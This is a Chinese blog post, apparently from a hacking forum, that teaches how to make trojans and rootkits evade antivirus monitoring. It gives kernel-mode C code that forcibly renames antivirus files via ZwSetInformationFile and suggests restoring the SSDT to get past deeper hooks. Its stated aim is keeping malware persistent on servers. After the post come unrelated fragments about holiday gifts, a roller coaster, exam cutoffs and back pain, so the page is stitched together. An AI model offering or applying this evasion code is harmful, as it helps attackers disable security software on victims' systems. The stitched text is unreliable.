这篇文章本来前2天就打算发出来的,最近手头有点小事,今天有空就把这篇文章整理出来了,前面先说点题外话。对于传统的远控来说,由于流传面积广,都成为各大杀软的重点查杀目标。不光特征码多,还有个致命缺陷。那就是关键释放过程早已被杀软熟悉了,严格的来说,这些木马的行为已经被杀软所掌握。如注射远程线程,启动傀儡IE,加载驱动,注册服务,修改敏感系统注册表键值等,这些行为靠修改特征码是很难做到的。所以经常出现这样的情况,刚做好的免杀过不了多久总会被杀软查杀。基本处于 免杀->被杀->在免->再被杀 尤其是象鸽子 PS这样的远控,如果是仅仅为控制好玩,那我不多说什么了。如果要使自己的ROOTKIT能够在服务器上长期存在,那么势必要自己独立开发一款属于自己的ROOTKIT,这个不是今天要讲的主题,以后有时间了,在发写如何编写ROOTKIT的文章,上周我发了一篇关于“一句话过360监控”的帖子,好象前天360已经修复了这个漏洞。今天我就说下,如何打造穿透所有杀软监控的程序。 首先 明确一点 当一个文件的路径被改变的时候,其应用程序就会发生错误,要么退出,要么崩溃。一般杀软为了保护自己的文件不被重命名,要么设置文件为“只读”属性,,要么利用Inline Hook IofCallDriver拦截删除(重命名)文件请求的API 如(CreateFile()),这样保护了自己的文件不被删除或重命名。其实重命名就是一个删除文件,再建文件的过程。 关于具体的实现代码,请百度或者google下,关于ring3下利用createFile()和Inline Hook IofCallDriver保护文件不被删除的原理,这里主要将如何强行重命名文件,导致杀软的所有监控失效。 对于一句话过360监控,我们是通过MoveFile()实现的,跟踪MoveFile可知,它会调用ZwSetInformationFile实现文件移动功能,这里要说下关于FileInformation的结构_FILE_RENAME_INFORMATION是未公开的,所以还是逆向下他的结构。 typedef struct _FILE_RENAME_INFORMATION { BOOLEAN ReplaceIfExists; HANDLE RootDirectory; ULONG FileNameLength; WCHAR FileName[1]; } FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; 其中ReplaceIfExists判断是否存在重命名的文件夹,RootDirectory 文件的绝对物理路径,ULONG FileNameLength文件名字长度,FileName文件名。这里说下,关于FileNameLength这个参数可以通过sizeof()这个函数获得,我们的实现过程如下,利用ZwCreateFile()打开文件夹,利用ZwSetInformationFile修改文件名。其实现代码如下: NTSTATUS Rename(PCHAR szFileName1,PCHAR szFileName2) { FILE_RENAME_INFORMATION fri; IO_STATUS_BLOCK iostatus; OBJECT_ATTRIBUTES oa; UNICODE_STRING pathnameW; ANSI_STRING pathnameA; NTSTATUS status; HANDLE hfile =NULL; CHAR szFileNameL[MAXPATHLEN]; strcpy(szFileNameL,"\\\\DosDevices\\\\"); strcat(szFileNameL,szFileName1); RtlInitAnsiString(&pathnameA,szFileNameL ); RtlAnsiStringToUnicodeString(&pathnameW,&pathnameA,TRUE); InitializeObjectAttributes(&oa, &pathnameW, OBJ_CASE_INSENSITIVE, NULL, NULL); status = ZwCreateFile(&hfile, DELETE, &oa, &iostatus, NULL, 0, FILE_SHARE_READ,FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT, NULL,0); RtlFreeUnicodeString(&pathnameW); if(!NT_SUCCESS(status)) { goto done; } strcpy(szFileNameL,\"\\\\DosDevices\\\\\"); strcat(szFileNameL,szFileName2); RtlInitAnsiString(&pathnameA,szFileNameL ); RtlAnsiStringToUnicodeString(&pathnameW,&pathnameA,TRUE); fri.FileNameLength=pathnameW.Length; memcpy(fri.FileName,pathnameW.Buffer,pathnameW.Length); fri.ReplaceIfExists=0; fri.RootDirectory=0; status = ZwSetInformationFile(hfile,&iostatus,&fri,sizeof(fri),FileRenameInformation); RtlFreeUnicodeString(&pathnameW); done: if(hfile) { ZwClose(hfile); } return status; } 这样就可以实现在RING0下强行重命名文件的效果了。当然对于AVP这样底层HOOK的比较深的杀软来说,事先还是需要恢复SSDT才能重命名文件的。一般来说,他会从驱动层过滤IoCallDriver()的请求,导致文件重命名失效,所以对于一些特殊的杀软还是要"特殊照顾"的。
注意了注意了!这周四可就是大年三十了!大年初三可就是情人节了!春节撞上情人节,这么喜庆又浪漫的大日子,都倒计时了,还在为礼物抓破头?今年原地过年,和TA分隔两地不能当面送礼?别急,京东时尚居家准备了海...
提及过山车,大伙儿都是会将它和童话、感情想到在一起,那如果是过山车和工作中配搭得话是个哪些情景呢?近期日本一儿童游乐园过山车变公司办公室,据统计为了更好地减轻大伙儿在肺炎疫情期内的焦虑不安心态,日本国...
一、陕西省:艺术史论、音乐学、音乐表演、作曲与作曲技术理论、录音艺术、舞蹈编导、舞蹈学、舞蹈表演、艺术与科技专业高考文化课录取控制分数线艺术文科300分,艺术理科273分。 二、外省:艺术史论、音乐...
安全措施1、登录页面加密在登录之后实施加密有可能有用,这就像把大门关上以防止马儿跑出去一样,不过他们并没有对登录会话加密,这就有点儿像在。 你好学习黑客不是一件从一定的事我以前也是对黑客很感兴趣,但是...
互联网发展至今各种应用层出不穷,用户量动辄上亿。所以如何构建一个优秀的高性能、高可靠的应用系统对每一个开发者至关重要。本文将我所学到和在工作中使用到的一些方法归纳总结,希望给其他同学起到一些借鉴作用,...
后背疼痛(肋巴骨和后背骨头疼是怎么回事) 伴随着年纪的提高,人体在所难免发生多种多样痛疼的主要表现,背部疼痛便是较为普遍的状况。好多人会把背部疼痛当做是一种病,事实上背部疼痛并不是全是病,很有可能由...